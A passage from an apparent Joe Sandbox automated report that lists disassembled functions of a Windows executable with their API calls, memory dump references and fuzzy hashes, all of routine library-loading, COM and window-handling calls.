                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00AD2350,?), ref: 00AD22A1
                                                              • GetProcAddress.KERNEL32(00000000), ref: 00AD22A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RoInitialize$combase.dll
                                                              • API String ID: 2574300362-340411864
                                                              • Opcode ID: 7b962b2c9b6004b148e38627259da5cfda7022d0f289e4b72e9f24fb16f3043b
                                                              • Instruction ID: 42a3ac2ecb36815ea723a5ef2cde3a44bafb233ed53cfa2228e29361a1928805
                                                              • Opcode Fuzzy Hash: 7b962b2c9b6004b148e38627259da5cfda7022d0f289e4b72e9f24fb16f3043b
                                                              • Instruction Fuzzy Hash: 20E0E5706A4302ABDA106F70ED49B5936A4A710702F604065F206F75E0CFB84090DF04
                                                              Function 00AD235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00AD2276), ref: 00AD2376
                                                              • GetProcAddress.KERNEL32(00000000), ref: 00AD237D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RoUninitialize$combase.dll
                                                              • API String ID: 2574300362-2819208100
                                                              • Opcode ID: 86bebbac2e66d7badc79f38d587a77b600b02e47d4a34d3c6ed64933e2af52a9
                                                              • Instruction ID: 265d96fe30cc92ae20e5b21d8b24f9943d6899e22a87dd2e38fbb9ad5595b7e6
                                                              • Opcode Fuzzy Hash: 86bebbac2e66d7badc79f38d587a77b600b02e47d4a34d3c6ed64933e2af52a9
                                                              • Instruction Fuzzy Hash: 38E099706A8300EBDA206F60ED09B093AA8B720702F600466F20EF75B0CFF99490DB14
                                                              Function 00B2AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: LocalTime__swprintf
                                                              • String ID: %.3d$WIN_XPe
                                                              • API String ID: 2070861257-2409531811
                                                              • Opcode ID: a8a8c8733b754491a69f2b7e89a961fa14143ad19b926abd40e875366e98492d
                                                              • Instruction ID: d2f320328bfd320a24d3bbb8a25bfb578be090047cde1c6e1ebe69c4966bd679
                                                              • Opcode Fuzzy Hash: a8a8c8733b754491a69f2b7e89a961fa14143ad19b926abd40e875366e98492d
                                                              • Instruction Fuzzy Hash: B8E01271804A28EBCB119750ED85DFAB3FCEB04741F2004D2F90EA2514D7359B94AA12
                                                              Function 00AB42F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00AB42EC,?,00AB42AA,?), ref: 00AB4304
                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AB4316
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-1355242751
                                                              • Opcode ID: cfef3d10a78cc2746ce6c60912af456c73febbbb46f06d73c532899411646f9f
                                                              • Instruction ID: 576069618bcd02269472f0ec1af854939b463683ed5f4cde35787f8e5dab99c1
                                                              • Opcode Fuzzy Hash: cfef3d10a78cc2746ce6c60912af456c73febbbb46f06d73c532899411646f9f
                                                              • Instruction Fuzzy Hash: 7ED0A930900F12AFD7204F20F80C78676E8BB08701B24846AE882E32B2EBB4CC808A50
                                                              Function 00B12205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00B121FB,?,00B123EF), ref: 00B12213
                                                              • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00B12225
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetProcessId$kernel32.dll
                                                              • API String ID: 2574300362-399901964
                                                              • Opcode ID: dd748957eb15aad65092ca6f6833f75c05774dba719e0e18fc4dd71cfc2db0be
                                                              • Instruction ID: 08bc11115f3237f40269769b50c8ecfe08b837b0e3bf333a55745ff37bf77df7
                                                              • Opcode Fuzzy Hash: dd748957eb15aad65092ca6f6833f75c05774dba719e0e18fc4dd71cfc2db0be
                                                              • Instruction Fuzzy Hash: CCD0A734500F129FD7214F30F80874976D4EB09304B1044AAE842F3160DB74D8C08690
                                                              Function 00AB434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00AB41BB,00AB4341,?,00AB422F,?,00AB41BB,?,?,?,?,00AB39FE,?,00000001), ref: 00AB4359
                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AB436B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-3689287502
                                                              • Opcode ID: 84a0d72f0929ac9f894d20ed95f1fc18874ba97b09bc27d8bb122f0dafe7d08f
                                                              • Instruction ID: ccc5e9157a9cc0fe0e2b176697cd468fc85cbfe605fcf3770ad4eb7ce4b82bff
                                                              • Opcode Fuzzy Hash: 84a0d72f0929ac9f894d20ed95f1fc18874ba97b09bc27d8bb122f0dafe7d08f
                                                              • Instruction Fuzzy Hash: 64D0A730500B229FD7604F30F808B4576D8AB18715B14446AE482E3162DBB4D8808A50
                                                              Function 00AF0539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,?,00AF051D,?,00AF05FE), ref: 00AF0547
                                                              • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00AF0559
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                              • API String ID: 2574300362-1071820185
                                                              • Opcode ID: 9a11d923a9c6865c498bf831a2a146fc4df9573c351a200c2836a0fc1c5de5f7
                                                              • Instruction ID: ba691da260038da1249edf489cace055cbc978a24bb62afa5e1476ea2690f41b
                                                              • Opcode Fuzzy Hash: 9a11d923a9c6865c498bf831a2a146fc4df9573c351a200c2836a0fc1c5de5f7
                                                              • Instruction Fuzzy Hash: CAD0A730500F129FD7208F60F808B1576E4AB10301B20C45DF546E3161DBF4C8808E50
                                                              Function 00AF0564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00AF052F,?,00AF06D7), ref: 00AF0572
                                                              • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00AF0584
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                              • API String ID: 2574300362-1587604923
                                                              • Opcode ID: de1586ae6ea178d526a9aeda352dabbb8186f547f004f83509ea9df09a180551
                                                              • Instruction ID: fa8382466fef1fd81db5a1cfb946b4bd1c6eb59aefe6e4200e458c9d1167ec78
                                                              • Opcode Fuzzy Hash: de1586ae6ea178d526a9aeda352dabbb8186f547f004f83509ea9df09a180551
                                                              • Instruction Fuzzy Hash: F4D05E30500B129BD7205F60B808B1677E4AB04301F208459F941E2160DAB4D4848A60
                                                              Function 00B0ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00B0ECBE,?,00B0EBBB), ref: 00B0ECD6
                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B0ECE8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                              • API String ID: 2574300362-1816364905
                                                              • Opcode ID: 17bb4d6faf74cf6ab0c6fae3bde4e4789540b1b3c4572caa25e89419a81c7351
                                                              • Instruction ID: f7daea3bc7d5aef63925e8e63f6be27b39ba9a7e0546f9444c164d74327fbe06
                                                              • Opcode Fuzzy Hash: 17bb4d6faf74cf6ab0c6fae3bde4e4789540b1b3c4572caa25e89419a81c7351
                                                              • Instruction Fuzzy Hash: 24D0C770501F23DFEB305F65F8497467BE4EB04751B1488AAF855E32A1DF75D8809650
                                                              Function 00B0BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00B0BAD3,00000001,00B0B6EE,?,00B4DC00), ref: 00B0BAEB
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00B0BAFD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                              • API String ID: 2574300362-199464113
                                                              • Opcode ID: cee8675f1fb8f06baa181b32f425bb05e436c07439db448fdc4cd55609fe597d
                                                              • Instruction ID: 19efb75fb33ffa2f7d1a8b861c7542a85000f00f14f6b5d54bb0ec4954b501d4
                                                              • Opcode Fuzzy Hash: cee8675f1fb8f06baa181b32f425bb05e436c07439db448fdc4cd55609fe597d
                                                              • Instruction Fuzzy Hash: C9D0C770914F129FDB305F65F888F557BD4EB05751B1044AAE857E31A4DBB4D890CA50
                                                              Function 00B13BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00B13BD1,?,00B13E06), ref: 00B13BE9
                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B13BFB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                              • API String ID: 2574300362-4033151799
                                                              • Opcode ID: f13467dd8460e2c5e34a6608c3af4b2a1409326f66b74dca06cbd8bd0084c523
                                                              • Instruction ID: fb8e830ca2ffddfdeec85006cfdb2cc48b8741396fe8315ba08e9f507f10254e
                                                              • Opcode Fuzzy Hash: f13467dd8460e2c5e34a6608c3af4b2a1409326f66b74dca06cbd8bd0084c523
                                                              • Instruction Fuzzy Hash: 59D0C774500F529FD7205F65F808747FAF4EB05715B2044D9E456F3160EBB4D4C48E90
                                                              Function 00AE9B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d2c32f1c61971db0e06beb9eaff6033021f1493463ab0bcac3b77fb78329f5a2
                                                              • Instruction ID: 3b5c9acc67c356adad46303c15154a6dd261ec1c10979c6cfef724d07dcf0a97
                                                              • Opcode Fuzzy Hash: d2c32f1c61971db0e06beb9eaff6033021f1493463ab0bcac3b77fb78329f5a2
                                                              • Instruction Fuzzy Hash: 97C13B75A0035AEFDB14DFA5C984AAFB7B5FF88700F208598E905AB251D730EE41DB90
                                                              Function 00B0AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 00B0AAB4
                                                              • CoUninitialize.OLE32 ref: 00B0AABF
                                                                • Part of subcall function 00AF0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00AF027B
                                                              • VariantInit.OLEAUT32(?), ref: 00B0AACA
                                                              • VariantClear.OLEAUT32(?), ref: 00B0AD9D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                              • String ID:
                                                              • API String ID: 780911581-0
                                                              • Opcode ID: d0c9423d4ce0e8d123feb647d0471c0d0282eb9d92f9226e5520bcbe56857aca
                                                              • Instruction ID: b71079895330ee0983e776961b26353a162a6e618d994f76f0be2dc558a7785f
                                                              • Opcode Fuzzy Hash: d0c9423d4ce0e8d123feb647d0471c0d0282eb9d92f9226e5520bcbe56857aca
                                                              • Instruction Fuzzy Hash: C8A126352047019FDB10DF14C991B5ABBE9FF89710F158999FA969B3A2CB30ED04CB86
                                                              Function 00AE91CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Variant$AllocClearCopyInitString
                                                              • String ID:
                                                              • API String ID: 2808897238-0
                                                              • Opcode ID: 37b1c2943d525dcd1065f34a5e26346ab5913d4ea1fd998f9be7fadcbbd76252
                                                              • Instruction ID: ee517ad29dbf25dfa11cec7a79e5ecf913bf16745cfd2eac29dc8d38769c3d53
                                                              • Opcode Fuzzy Hash: 37b1c2943d525dcd1065f34a5e26346ab5913d4ea1fd998f9be7fadcbbd76252
                                                              • Instruction Fuzzy Hash: 79517F30604787ABDB24AF6BD595AAFB3E9EF45310F30981FE556CB2D2DB7098808705
                                                              Function 00AD365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                              • String ID:
                                                              • API String ID: 3877424927-0
                                                              • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                              • Instruction ID: 7a5ee04c034970ad22617976a8b76024e0c65c8d8d371dd19adf899b50c0697a
                                                              • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                              • Instruction Fuzzy Hash: 0C51C1B2A00605ABCF24DF6989846AE77B1AF40320F24862BF837963D0D774DF50DB52
                                                              Function 00B1C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowRect.USER32(00C96758,?), ref: 00B1C544
                                                              • ScreenToClient.USER32(?,00000002), ref: 00B1C574
                                                              • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00B1C5DA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientMoveRectScreen
                                                              • String ID:
                                                              • API String ID: 3880355969-0
                                                              • Opcode ID: ce8319aeb26379c356cd3f4de0ca4e09ccb3ece9d7a659233ccd4a3a2d383696
                                                              • Instruction ID: 09e1ac3ea5aebcffcc143cbf5ef61b619aa657b8f89964535150a9dc16eb65d4
                                                              • Opcode Fuzzy Hash: ce8319aeb26379c356cd3f4de0ca4e09ccb3ece9d7a659233ccd4a3a2d383696
                                                              • Instruction Fuzzy Hash: D5514E75900204EFCF10DF68D881AEE7BF6EB55720F608699F9699B291D730ED81CB90
                                                              Function 00AEC410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00AEC462
                                                              • __itow.LIBCMT ref: 00AEC49C
                                                                • Part of subcall function 00AEC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00AEC753
                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00AEC505
                                                              • __itow.LIBCMT ref: 00AEC55A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
